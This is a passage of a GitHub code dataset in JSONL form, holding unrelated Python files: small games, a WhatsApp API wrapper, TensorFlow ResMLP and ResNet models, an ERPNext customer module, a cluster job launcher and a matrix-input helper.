Hangman accordingly.\n\n :param letter: str, the letter of the button that was pressed.\n :param index: int, the index of the abovesaid button in the list,\n where the buttons exist.\n \"\"\"\n\n # Since the button was pressed, disable it.\n self.__buttons[index].configure(state=DISABLED)\n\n # Get the already guessed letters and make a list out of them.\n guessed_letters = list(self.__word_label.cget(\"text\"))\n\n # Also make a list of the letters of the country, so that we can\n # check the count.\n letters_of_the_country = list(self.__spaced_word)\n\n # If a letter is found, go through the letters of the country and\n # check how many there are.\n if self.__spaced_word.count(letter) > 0:\n for i in range(len(letters_of_the_country)):\n if letters_of_the_country[i] == letter:\n\n # Add the correctly guessed letters to the list,\n # and make tem appear.\n guessed_letters[i] = letter\n\n self.__word_label.configure(text=\"\".join(guessed_letters),\n font=\"Euphemia 14\")\n\n # Check if won:\n if self.__word_label.cget(\"text\") == self.__spaced_word:\n # Call a new game and pop up a messagebox.\n messagebox.showinfo(\"Hangman\",\n \"YOU WON!\")\n self.new_game()\n else:\n self.__wrong_guesses += 1\n\n # Change the hangman picture according to the amount of guesses.\n self.__hangman_label.configure(image=\n self.__photos[self.__wrong_guesses])\n\n # If the user guessed 7 times already, it's game over.\n if self.__wrong_guesses == 7:\n messagebox.showwarning(\"Hangman\",\n \"Game Over\")\n\n self.new_game()\n\n\ndef main():\n Hangman()\n\n\nif __name__ == '__main__':\n main()\n \n","repo_name":"k9du/hangman-py","sub_path":"Hangman/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"4322545582","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 29 11:48:14 2020\n\n@author: Titus Newton\n\"\"\"\n\nimport random\n\nbalance = 0\nplay_again = True\nprint('*'*21)\nprint('Number Guessing Game.')\nprint('*'*21)\nname = input('Enter your Name: ')\nwhile play_again:\n if balance < 5:\n amount = int(input(f'Welcome {name},Kindly recharge with min 5 Rs/game or more to play the game: '))\n balance+= amount\n else:\n balance -= 5\n print('Rs. 5 deducted and remaining balance is',balance)\n c_guess = random.randint(1,10)\n for chance in range(1,4):\n print() # for an empty line\n print(f'chance: {chance} out of 3')\n print('-'*20)\n u_guess = int(input('Enter a guess in between 1 and 10: '))\n if c_guess == u_guess:\n print(f'Congratz {name} you have guessed correctly and')\n if chance == 1:\n print('You have won 100 Rs.')\n balance += 100\n elif chance == 2:\n print('You have won 75 Rs.')\n balance += 75\n else:\n print('You have won 50 Rs.')\n balance += 50\n break\n else:\n print(f'Sorry {name}, a wrong guess')\n if chance < 3:\n if u_guess < c_guess:\n print('I am thinking of a bigger number')\n else:\n print('I am thinking of a smaller number')\n else:\n print('I was thinking of a number',c_guess)\n choice = input('Do you wanna play again [yes/no]: ')\n if choice != 'yes':\n play_again = False\n withdraw = input('Do you wanna withdraw amount [yes/no]: ')\n if withdraw == 'yes' and balance > 0:\n print(f'Available balance is {balance}')\n withdraw_amt = int(input('Enter amount to withdraw: '))\n if withdraw_amt <= balance:\n print(f'{withdraw_amt} Rs. transferred to your bank a/c')\n balance -= withdraw_amt\n else:\n print('Insufficient balance')\n else:\n print('Insufficient balance')\n if balance > 0:\n print(f'Thanks {name} for your donation of Rs. {balance}')","repo_name":"Titus005/Python-Projects","sub_path":"simple_guessing_game.py","file_name":"simple_guessing_game.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71668303117","text":"import os\nimport requests\n\nimport json\n\n\nclass WhatsAppWrapper:\n\n API_URL = \"https://graph.facebook.com/v13.0/\"\n API_TOKEN = os.environ.get(\"WHATSAPP_API_TOKEN\")\n NUMBER_ID = os.environ.get(\"WHATSAPP_NUMBER_ID\")\n\n def __init__(self):\n self.headers = {\n \"Authorization\": f\"Bearer {self.API_TOKEN}\",\n \"Content-Type\": \"application/json\",\n }\n self.API_URL = self.API_URL + self.NUMBER_ID\n\n def send_template_message(self, template_name, language_code, phone_number):\n\n payload = json.dumps({\n \"messaging_product\": \"whatsapp\",\n \"to\": phone_number,\n \"type\": \"template\",\n \"template\": {\n \"name\": template_name,\n \"language\": {\n \"code\": language_code\n }\n }\n })\n\n response = requests.request(\"POST\", f\"{self.API_URL}/messages\", headers=self.headers, data=payload)\n\n assert response.status_code == 200, \"Error sending message\"\n\n return response.status_code\n\n def process_webhook_notification(self, data):\n \"\"\"_summary_: Process webhook notification\n For the moment, this will return the type of notification\n \"\"\"\n\n response = []\n\n for entry in data[\"entry\"]:\n\n for change in entry[\"changes\"]:\n response.append(\n {\n \"type\": change[\"field\"],\n \"from\": change[\"value\"][\"metadata\"][\"display_phone_number\"],\n }\n )\n\n return response\n","repo_name":"koladev32/flask-whatsapp-cloud-api","sub_path":"app/whatsapp_client.py","file_name":"whatsapp_client.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"29"} +{"seq_id":"34258393417","text":"#CurrencyRates Class\r\n\r\nclass CurrencyRates:\r\n \r\n def __init__(self, currencyName, currencyCode, euro_to_currency, currency_to_euro):\r\n self.currencyName = currencyName\r\n self.currencyCode = currencyCode\r\n self.euro_to_currency = float(euro_to_currency)\r\n self.currency_to_euro = float(currency_to_euro)\r\n\r\n def __str__(self):\r\n return (\"\\n%s:%s \\n%s:%s \\n%s:%.3f \\n%s:%.3f\" % ('Currency Name',self.currencyName,\r\n 'Curency Code',self.currencyCode, 'ConvFrmEuro',self.euro_to_currency,\r\n 'ConvToEuro',self.currency_to_euro))\r\n \r\n","repo_name":"BobGanti/Bobga-Airline-Fuel-Manager","sub_path":"CurrencyRates.py","file_name":"CurrencyRates.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"41075004057","text":"import tensorflow as tf\r\nfrom tensorflow.keras.models import Model\r\n\r\nfrom .layers import Base\r\n\r\n\r\nclass StochDepth(tf.keras.Model):\r\n \"\"\"Batchwise Dropout used in EfficientNet, optionally sans rescaling.\"\"\"\r\n\r\n def __init__(self, drop_rate, scale_by_keep=False, **kwargs):\r\n super().__init__(**kwargs)\r\n self.drop_rate = drop_rate\r\n self.scale_by_keep = scale_by_keep\r\n\r\n def call(self, x, training):\r\n if not training:\r\n return x\r\n\r\n batch_size = tf.shape(x)[0]\r\n r = tf.random.uniform(shape=[batch_size, 1, 1], dtype=x.dtype)\r\n keep_prob = 1.0 - self.drop_rate\r\n binary_tensor = tf.floor(keep_prob + r)\r\n if self.scale_by_keep:\r\n x = x / keep_prob\r\n return x * binary_tensor\r\n\r\n\r\nclass Affine(tf.keras.layers.Layer):\r\n def __init__(self, channels, **kwargs):\r\n super().__init__(**kwargs)\r\n self.alpha = self.add_weight(\r\n name=\"alpha\",\r\n shape=(channels,),\r\n initializer=\"ones\",\r\n trainable=True,\r\n )\r\n self.beta = self.add_weight(\r\n name=\"beta\",\r\n shape=(channels,),\r\n initializer=\"zeros\",\r\n trainable=True,\r\n )\r\n\r\n def call(self, x):\r\n return self.alpha * x + self.beta\r\n\r\n\r\ndef MLP(x, dim, prefix=\"\"):\r\n out = tf.keras.layers.Dense(dim * 4, name=f\"{prefix}_dense_01\")(x)\r\n out = tf.keras.layers.Activation(activation=\"gelu\", name=f\"{prefix}_act_01\")(out)\r\n out = tf.keras.layers.Dense(dim, name=f\"{prefix}_dense_02\")(out)\r\n return out\r\n\r\n\r\ndef CaiT_LayerScale_init(network_depth):\r\n if network_depth <= 18:\r\n return 1e-1\r\n elif network_depth <= 24:\r\n return 1e-5\r\n else:\r\n return 1e-6\r\n\r\n\r\ndef ResMLP_Blocks(x, nb_patches, dim, layerscale_init, stochdepth_rate, prefix=\"\"):\r\n out = x\r\n out = Affine(channels=dim)(out)\r\n out = tf.keras.layers.Permute(dims=(2, 1))(out)\r\n out = tf.keras.layers.Dense(nb_patches, name=f\"{prefix}_dense_01\")(out)\r\n out = tf.keras.layers.Permute(dims=(2, 1))(out)\r\n out = Base.SkipInitChannelwise(channels=dim, init_val=layerscale_init)(out)\r\n\r\n if stochdepth_rate > 0.0:\r\n out = StochDepth(stochdepth_rate, scale_by_keep=True)(out)\r\n\r\n x = tf.keras.layers.Add()([out, x])\r\n\r\n out = x\r\n out = Affine(channels=dim)(out)\r\n out = MLP(out, dim, prefix=f\"{prefix}_mlp\")\r\n out = Base.SkipInitChannelwise(channels=dim, init_val=layerscale_init)(out)\r\n\r\n if stochdepth_rate > 0.0:\r\n out = StochDepth(stochdepth_rate, scale_by_keep=True)(out)\r\n\r\n out = tf.keras.layers.Add()([out, x])\r\n return out\r\n\r\n\r\ndefinitions = {\r\n \"RMLP-S12\": {\"patch_size\": 16, \"dim\": 384, \"depth\": 12},\r\n \"RMLP-S24\": {\"patch_size\": 16, \"dim\": 384, \"depth\": 24},\r\n \"RMLP-B24\": {\"patch_size\": 16, \"dim\": 768, \"depth\": 24},\r\n}\r\n\r\n\r\ndef ResMLP(\r\n in_shape=(320, 320, 3),\r\n out_classes=2000,\r\n definition_name=\"RMLP-S24\",\r\n input_scaling=\"inception\",\r\n):\r\n definition = definitions[definition_name]\r\n dim = definition[\"dim\"]\r\n depth = definition[\"depth\"]\r\n patch_size = definition[\"patch_size\"]\r\n layerscale_init = CaiT_LayerScale_init(depth)\r\n stochdepth_rate = 0.1\r\n\r\n nb_patches = (in_shape[0] * in_shape[1]) // (patch_size**2)\r\n\r\n img_input = tf.keras.layers.Input(shape=in_shape)\r\n x = Base.input_scaling(method=input_scaling)(img_input)\r\n\r\n prefix = \"root\"\r\n x = tf.keras.layers.Conv2D(\r\n filters=dim,\r\n kernel_size=patch_size,\r\n strides=patch_size,\r\n padding=\"same\",\r\n name=f\"{prefix}_conv2d_01\",\r\n )(x)\r\n x = tf.keras.layers.Reshape(target_shape=(-1, dim))(x)\r\n\r\n for i in range(depth):\r\n prefix = f\"block{i}\"\r\n curr_stochdepth_rate = (stochdepth_rate / depth) * i\r\n x = ResMLP_Blocks(\r\n x, nb_patches, dim, layerscale_init, curr_stochdepth_rate, prefix\r\n )\r\n\r\n x = Affine(dim)(x)\r\n x = tf.keras.layers.GlobalAveragePooling1D(name=\"predictions_globalavgpooling\")(x)\r\n x = tf.keras.layers.Dense(out_classes, name=\"predictions_dense\")(x)\r\n x = tf.keras.layers.Activation(\"sigmoid\", name=\"predictions_sigmoid\")(x)\r\n\r\n model = Model(img_input, x, name=f\"ResMLP-{definition_name}\")\r\n return model\r\n","repo_name":"SmilingWolf/SW-CV-ModelZoo","sub_path":"Models/ResMLP.py","file_name":"ResMLP.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"29"} +{"seq_id":"36422880392","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[35]:\n\n\nimport os, re, glob, sys\n\n\n# In[36]:\n\n\npipeline_name = 'PI' # python + ilastik\ndata_path = '/home/exacloud/gscratch/HeiserLab/images/'\nplateID = sys.argv[1]\ninput_files_path = os.path.join(data_path+plateID,\"Analysis\",pipeline_name,\"intermediate_files\")\nimage_stack_paths = sorted(glob.glob(input_files_path+\"/*stack.tif\"))\nmask_paths = sorted(glob.glob(input_files_path+\"/*Segmentation.h5\"))\nmainpath = os.path.join(data_path,plateID,\"Analysis\",pipeline_name)\n\n\n# Only create an job if there is no output file.\n\n# In[59]:\n\n\nwells = sorted(set(re.findall(r\"_[A-Z][1-9]_\", ''.join(mask_paths)))) #get a unique set of the wells with images that have been segmented\n\nfor well in wells:\n #initate a job if the csv file for the current well does not exists\n l1_file_path = data_path+plateID+\"/Analysis/\"+pipeline_name+\"/\"+plateID+well+\"level_1.csv\"\n well = re.sub(\"_\",\"\",well)\n if not os.path.exists(l1_file_path):\n cmd = 'srun -c 8 -J M'+plateID[3:7]+well[0:2]+' -o M'+plateID[3:7]+well[0:2]+'_out.txt -t 23:00:00 python Apply_ilastik_masks.py '+plateID+' '+well+' &'\n print(\"launching job with command \"+cmd)\n returned_value = os.system(cmd) # returns the exit code in unix\n if returned_value == 0:\n print(\"launched job to create data for \"+l1_file_path)\n else:\n print(\"failed to launch job to create data for \"+l1_file_path)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"markdane/CellTracking","sub_path":"python/generate_apply_ilastik_jobs.py","file_name":"generate_apply_ilastik_jobs.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"19110473410","text":"# Youtube Video Downloader\n# This is a little training project\n# From \"Internet Made Coder\" on Youtube\n# sudo pip3 install pytube\nfrom pytube import YouTube\nfrom sys import argv\n\n\ndef start():\n e_link = argv[1]\n e_yt = YouTube(e_link)\n print(\"Titre : \", e_yt.title)\n print(\"Vues :\", e_yt.views)\n\n e_yd = e_yt.streams.get_highest_resolution()\n e_yd.download(\"./videos_downloaded\")\n\n\nif __name__ == '__main__':\n start()\n","repo_name":"BossaMuffin/Function_YoutubeVideoDonwloader","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"11256999744","text":"import logging\nfrom .subject import Subject, Event\n\n\"\"\" Class that receive an Event from the bot and notify about such an update all its Observers\"\"\"\nclass Controller(Subject):\n def __init__(self) -> None:\n super().__init__()\n self.events = [] \n \n def receive_event(self, event: Event):\n logging.info(f\"Controller accepted {event.status} #{event.event_id}\")\n self.events.append(event)\n self.send_event(event)\n \n def remove_event(self, event: Event):\n self.events.remove(event)\n logging.info(f\"Controller removed Event #{event.event_id} from the list of Events\")\n \n def send_event(self, event: Event):\n if self.events:\n event = self.events[-1]\n self.notify(event)\n logging.info(f\"Controller sent Event #{event.event_id} to Observers\")\n self.remove_event(event)\n else:\n logging.info(f\"There are no Events to work on\")\n","repo_name":"nllllibeth/reminder_bot","sub_path":"observer_pattern/subject/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"74651054799","text":"\"\"\"Prototype Runtime for Small ResNet Model\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom OpenImagesClassifier import small_resnet_model as rs\nfrom OpenImagesClassifier import config\n\nimport tensorflow as tf\nimport sqlite3\nimport os\nimport numpy as np\n\n# only for prototyping\nimport cv2\nimport time\n\ndef select_random_from_db(count, subset):\n X = np.zeros([count, 224, 224, 3]) # only prototype no data augmentation here\n y = np.zeros([count])\n with sqlite3.connect(config.DATABASE['filename']) as conn:\n c = conn.cursor()\n result = c.execute(\"\"\"SELECT I.ImageID, D.DisplayLabelName, D.ClassNumber FROM Images I\n INNER JOIN Labels L ON I.ImageID = L.ImageID\n INNER JOIN Dict D ON L.LabelName = D.LabelName\n WHERE I.Subset = ? \n ORDER BY random() \n LIMIT ?\"\"\", (subset, count))\n\n for i, row in enumerate(result.fetchall()):\n path = config.DATA_DIRECTORY + \"/Images/{}/{}/{}.{}\".format(row[1], subset, row[0], \"jpg\")\n if os.path.exists(path):\n image = cv2.imread(path)\n resized = cv2.resize(image, dsize=(224, 224))\n resized = resized.astype(float)\n X[i] = resized / 255.0\n y[i] = row[2]\n\n return X, y\n\n\ndef trainable_network(X, y):\n\n logits = rs.build_small_resnet(X, 10, True)\n\n xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=y, logits=logits)\n loss = tf.reduce_mean(xentropy, name='loss')\n tf.summary.scalar('loss', loss)\n\n optimizer = tf.train.AdamOptimizer()\n training_op = optimizer.minimize(loss)\n return training_op, tf.summary.merge_all(), logits\n\n\ndef inference_network(X):\n logits = rs.build_small_resnet(X, 10, False)\n softmax = tf.nn.softmax(logits)\n return softmax\n\n\ndef train():\n time_1 = time.time()\n X_batch, y_batch = select_random_from_db(256, 'train')\n X = tf.placeholder(tf.float32, shape=(None, 224, 224, 3), name='X')\n y = tf.placeholder(tf.int32, shape=(None), name='y')\n\n train_op, merged, logits = trainable_network(X, y)\n\n with tf.Session() as sess:\n\n train_writer = tf.summary.FileWriter(config.SUMMARY_DIR + '/train', sess.graph)\n run_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE)\n run_metadata = tf.RunMetadata()\n\n saver = tf.train.Saver()\n\n tf.global_variables_initializer().run()\n checkpoint_path = tf.train.latest_checkpoint(config.MODEL_SAVE_DIR)\n if checkpoint_path is not None:\n saver.restore(sess, checkpoint_path)\n print(\"Loaded saved Model\")\n\n summary, _ = sess.run([merged, train_op], feed_dict={X: X_batch, y: y_batch}, options=run_options,\n run_metadata=run_metadata)\n\n saved_path = saver.save(sess, config.MODEL_SAVE_DIR + '/small_resnet.ckpt')\n print(\"Saved model to path:\", saved_path)\n train_writer.add_run_metadata(run_metadata, tag='runtime-test')\n train_writer.add_summary(summary)\n train_writer.flush()\n\n delta_time = time.time() - time_1\n print(\"Delta Time:\", delta_time)\n\n\ndef predict():\n X_batch, y_batch = select_random_from_db(10, 'train')\n X = tf.placeholder(tf.float32, shape=(None, 224, 224, 3), name='X')\n\n infer_network = inference_network(X)\n\n with tf.Session() as sess:\n saver = tf.train.Saver()\n tf.global_variables_initializer().run()\n checkpoint_path = tf.train.latest_checkpoint(config.MODEL_SAVE_DIR)\n if checkpoint_path is not None:\n saver.restore(sess, checkpoint_path)\n print(\"Loaded saved Model\")\n\n predictions = sess.run([infer_network], feed_dict={X: X_batch})\n\n print(y_batch)\n print(predictions)\n\nif __name__ == '__main__':\n train()\n\n","repo_name":"tkrieger/OpenImagesClassifier","sub_path":"OpenImagesClassifier/small_resnet_prototype.py","file_name":"small_resnet_prototype.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"25286094781","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 22 11:46:25 2014\n\nDies schreibt die Wettervorhersage in die SVG-Datei\n\n@author: dario\n\"\"\"\nimport datetime\nimport codecs\nfrom symboldict import symboldict #hier werden die ganzen Vorhersagesymbole eingelesen\n\ndef svgyr(wetteryr):\n #Ersetzen von Sonnenauf- und untergang\n sunrise = datetime.datetime.strptime( wetteryr['sun']['rise'], '%Y-%m-%dT%H:%M:%S' ) \n sunset = datetime.datetime.strptime( wetteryr['sun']['set'], '%Y-%m-%dT%H:%M:%S' )\n tmplt = codecs.open('template-subst.svg', 'r', encoding='utf-8').read()\n tmplt = tmplt.replace('SUNSET', sunset.strftime('%H:%M'))\n tmplt = tmplt.replace('SUNRISE', sunrise.strftime('%H:%M'))\n \n #Ersetzen von Vorhersage\n #Day = {'0': str('0:00 bis 6:00'), '1': str('6:00 bis 12:00'),'2': str('12:00 bis 18:00'),'3': str('18:00 bis 0:00')}\n Day = {'0': str(u'2. Nachthälfte'), '1':'Vormittag', '2':'Nachmittag', '3':str(u'1. Nachthälfte')}\n Symbols = symboldict()\n i=1\n liste = ['std0', 'std6', 'std12']\n for key in liste:\n nr=str(i)\n tmplt = tmplt.replace('TEMP'+nr, wetteryr[key]['temp']['value'])\n tmplt = tmplt.replace('PREC'+nr, wetteryr[key]['prec']['value'])\n tmplt = tmplt.replace('DAYTIME'+nr, Day[wetteryr[key]['time']['period']])\n tmplt = tmplt.replace('SYMBOL'+nr, Symbols[wetteryr[key]['sky']['number']])\n i+=1\n \n #neues SVG schreiben\n codecs.open('template-yr.svg', 'w', encoding='utf-8').write(tmplt)\n return 0\n","repo_name":"zeitgespenst/WeatherDisplay","sub_path":"Server/svgyr.py","file_name":"svgyr.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"33987074563","text":"import sys\ninput = sys.stdin.readline\n\ndx = [0, -1, 0, 1, 0]\ndy = [0, 0, -1, 0, 1]\n\ndef recur(cnt, cost):\n global min_cost\n if cnt == 3:\n min_cost = min(min_cost, cost)\n return\n\n for y in range(1, n-1):\n for x in range(1, n-1):\n temp = []\n for i in range(5):\n nx = x + dx[i]\n ny = y + dy[i]\n if visit[ny][nx] == 1:\n break\n temp.append((nx, ny))\n else:\n add_cost = 0\n for nx, ny in temp:\n visit[ny][nx] = 1\n add_cost += board[ny][nx]\n recur(cnt + 1, cost + add_cost)\n for nx, ny in temp:\n visit[ny][nx] = 0\n\nn = int(input())\nboard = []\nmin_cost = 3001\n\nfor _ in range(n):\n board.append(list(map(int, input().split())))\n\nvisit = [[0 for _ in range(n)] for _ in range(n)]\nrecur(0, 0)\nprint(min_cost)","repo_name":"elcote/elice-coding-test","sub_path":"박근백/week5/[14620]꽃길/14620.py","file_name":"14620.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"74491694799","text":"import frappe\nfrom frappe import _\nfrom frappe.utils.data import cint, cstr\nfrom erpnext.selling.doctype.customer.customer import Customer\n\ndef maintance_contact_details(doc,actions):\n \n if doc.dealer_name and doc.dealer_contact_no and (actions == \"after_insert\" or not doc.is_new()):\n com_add = frappe.get_all(\"Dynamic Link\", {\"parenttype\": \"Contact\", \"link_doctype\": doc.doctype, \"link_name\": doc.name}, pluck=\"parent\")\n for i in com_add:\n contact = frappe.get_doc(\"Contact\", i)\n if contact.maintenance_type == \"Dealer\":\n contact.update(\n {\n 'phone_nos':\n [{\"phone\" :doc.dealer_contact_no}], \n 'first_name':f\"{doc.dealer_name} Dealer\"\n })\n contact.save(ignore_permissions=True)\n if not frappe.db.exists(\"Contact\", {'maintenance_type': \"Dealer\", \"name\" : ['in',com_add]}):\n document_dc = frappe.new_doc(\"Contact\")\n document_dc.first_name = f\"{doc.dealer_name} Dealer\"\n document_dc.maintenance_type = \"Dealer\"\n document_dc.append('phone_nos', \n dict(\n phone = doc.dealer_contact_no,\n is_primary_mobile_no = 1\n ))\n document_dc.append('links', \n dict(\n link_doctype = doc.doctype,\n link_name = doc.name\n ))\n document_dc.save(ignore_permissions=True)\n if doc.supervisor_name and doc.supervisor_number and (actions == \"after_insert\" or not doc.is_new()):\n com_add = frappe.get_all(\"Dynamic Link\", {\"parenttype\": \"Contact\", \"link_doctype\": doc.doctype, \"link_name\": doc.name}, pluck=\"parent\")\n for i in com_add:\n contact = frappe.get_doc(\"Contact\", i)\n if contact.maintenance_type == \"Supervisor\":\n contact.update(\n {\n 'phone_nos':\n [{\"phone\" :doc.supervisor_number}], \n 'first_name':f\"{doc.supervisor_name} Supervisor\"\n })\n contact.save(ignore_permissions=True)\n if not frappe.db.exists(\"Contact\", {'maintenance_type': \"Supervisor\", \"name\" : ['in',com_add]}):\n document_dc = frappe.new_doc(\"Contact\")\n document_dc.first_name = f\"{doc.supervisor_name} Supervisor\"\n document_dc.maintenance_type = \"Supervisor\"\n document_dc.append('phone_nos', \n dict(\n phone = doc.supervisor_number,\n is_primary_mobile_no = 1\n ))\n document_dc.append('links', \n dict(\n link_doctype = doc.doctype,\n link_name = doc.name\n ))\n document_dc.save(ignore_permissions=True)\n\ndef set_exisiting_farm(doc,actions):\n if doc.name and (actions == \"after_insert\" or not doc.is_new()):\n if doc.lead_name:\n farm_details = frappe.get_value(\"Farm Details\", {\"lead\": doc.lead_name},\"name\")\n if farm_details:\n farm = frappe.get_doc(\"Farm Details\", farm_details)\n if farm.lead == doc.lead_name:\n farm.update(\n {\n 'customer':doc.name\n })\n farm.save(ignore_permissions=True)\n\n\n@frappe.whitelist()\ndef get_farm_list(ref_doctype, ref_name):\n if(not ref_doctype or not ref_name):\n return\n field = frappe.scrub(ref_doctype)\n farm_list = frappe.get_all(\"Farm Details\", filters={field:ref_name}, fields=[\"*\"])\n for i in farm_list:\n i['compatible_breed'] = \", \".join(frappe.get_all(\"Compatible Breed Table\", filters={\"parent\":i['name']}, pluck=\"compatible_breed\"))\n i[\"display\"] = \"\"\n if(i[\"farm_name\"]):\n i[\"display\"] += f\"\"\"\n

Farm: {i[\"farm_name\"] or \"\"}

\n \"\"\"\n if(i[\"farm_location\"]):\n i[\"display\"] += f\"\"\"\n

Loc: {i[\"farm_location\"] or \"\"}

\n \"\"\"\n if(i[\"ton_of_feed\"]):\n i[\"display\"] += f\"\"\"\n

Ton of Feed: {i[\"ton_of_feed\"] or \"\"}

\n \"\"\"\n if(i[\"chick_capacity__laying\"]):\n i[\"display\"] += f\"\"\"\n

Laying Capacity: {i[\"chick_capacity__laying\"] or \"\"}

\n \"\"\"\n if(i[\"compatible_breed\"]):\n i[\"display\"] += f\"\"\"\n

Compatible Breeds: {i[\"compatible_breed\"] or \"\"}

\n \"\"\"\n return farm_list\n\ndef create_farm(self, event=None):\n if self.flags.is_new_doc and self.get(\"batch_size\"):\n doc = frappe.new_doc('Farm Details')\n doc.update({\n \"customer\": self.name,\n \"chick_capacity__laying\": self.get(\"batch_size\"),\n \"farm_name\": (self.get('customer_name') or '') + ' Farm'\n })\n if frappe.db.get_value(\"Farm Details\", doc.get(\"farm_name\")) and not frappe.flags.in_import:\n count = frappe.db.sql(\n \"\"\"select ifnull(MAX(CAST(SUBSTRING_INDEX(name, ' ', -1) AS UNSIGNED)), 0) from `tabFarm Details`\n where name like %s\"\"\",\n \"%{0} - %\".format(self.customer_name),\n as_list=1,\n )[0][0]\n count = cint(count) + 1\n\n doc.update({\n \"__newname\": \"{0} - {1}\".format(self.customer_name, cstr(count))\n })\n\n doc.insert()\n\n\nclass TSCustomer(Customer):\n def create_primary_contact(self):\n if not self.customer_primary_contact and not self.lead_name:\n if self.mobile_no or self.email_id:\n contact = make_contact(self)\n self.db_set(\"customer_primary_contact\", contact.name)\n self.db_set(\"mobile_no\", self.mobile_no)\n self.db_set(\"email_id\", self.email_id)\n\n def create_primary_address(self):\n from frappe.contacts.doctype.address.address import get_address_display\n\n if self.flags.is_new_doc and self.get(\"address_line1\"):\n address = make_address(self)\n address_display = get_address_display(address.name)\n\n self.db_set(\"customer_primary_address\", address.name)\n self.db_set(\"primary_address\", address_display)\n\ndef make_contact(args, is_primary_contact=1):\n contact = frappe.get_doc(\n {\n \"doctype\": \"Contact\",\n \"first_name\": args.get(\"name\"),\n \"is_primary_contact\": is_primary_contact,\n \"designation\": args.get(\"designation\"),\n \"links\": [{\"link_doctype\": args.get(\"doctype\"), \"link_name\": args.get(\"name\")}],\n }\n )\n if args.get(\"email_id\"):\n contact.add_email(args.get(\"email_id\"), is_primary=True)\n if args.get(\"mobile_no\"):\n contact.add_phone(args.get(\"mobile_no\"), is_primary_mobile_no=True)\n contact.insert()\n\n return contact\n\ndef make_address(args, is_primary_address=1):\n reqd_fields = []\n for field in [\"city\", \"country\"]:\n if not args.get(field):\n reqd_fields.append(\"
  • \" + field.title() + \"
  • \")\n\n if reqd_fields:\n msg = _(\"Following fields are mandatory to create address:\")\n frappe.throw(\n \"{0}

      {1}
    \".format(msg, \"\\n\".join(reqd_fields)),\n title=_(\"Missing Values Required\"),\n )\n frappe.errprint(args.get(\"gstin\") or \"None\")\n address = frappe.get_doc(\n {\n \"doctype\": \"Address\",\n \"address_title\": args.get(\"name\"),\n \"address_line1\": args.get(\"address_line1\"),\n \"address_line2\": args.get(\"address_line2\"),\n \"city\": args.get(\"city\"),\n \"custom_district\": args.get(\"district\"),\n \"state\": args.get(\"state\"),\n \"pincode\": args.get(\"pincode\"),\n \"custom_aadhar_no\": args.get(\"aadhar_no\"),\n \"country\": args.get(\"country\") or \"India\",\n \"gstin\": args.get(\"gstin\"),\n \"links\": [{\"link_doctype\": args.get(\"doctype\"), \"link_name\": args.get(\"name\")}],\n \"gst_category\": \"Registered Regular\" if args.get(\"gstin\") else \"Unregistered\",\n }\n ).insert()\n\n return address","repo_name":"thirvusoft/SVE","sub_path":"sri_venkatesa_enterprises/sri_venkatesa_enterprises/custom/py/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"9579698505","text":"import csv\nimport numpy as np\nimport copy\nfrom fractions import Fraction\n\ndef slau_inp_matr():\n \"\"\"\n Функция возвращает матрицу, введённую пользователем с клавиатуры.\n\n Returns\n -------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n \"\"\"\n while True:\n try:\n m = int(input('Сколько будет строк в матрице? '))\n except:\n print('Вы ввели не число')\n else:\n if m > 0:\n break\n else:\n print('Вы ввели не натуральное число') \n\n while True:\n try:\n n = int(input('Сколько будет столбцов в матрице? '))\n except:\n print('Вы ввели не число')\n else:\n if n > 0:\n break\n else:\n print('Вы ввели не натуральное число')\n \n print(\"Введите элементы матрицы (заполнение идёт по строкам)\")\n a = []\n for i in range(m):\n a.append([])\n for j in range(n):\n while True:\n try:\n print(f'Введите элемент a[{i+1}][{j+1}]')\n elem = eval(input())\n except:\n print('Вы ввели не число')\n else:\n break\n a[i].append(elem)\n return a\n\n\n\ndef csv_inp_matr(filename):\n \"\"\"\n Функция импортирует матрицу из csv\n\n Parameters\n ----------\n filename : str\n Абсолютный или локальный путь до файла .csv\n\n Returns\n -------\n data : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, импортированная из csv\n\n \"\"\"\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n data = list(reader)\n for i in range(len(data)):\n for j in range(len(data[0])):\n data[i][j] = eval(data[i][j])\n return data\n \n\ndef slau_outp_matr(a):\n \"\"\"\n Функция для вывода матрицы\n\n 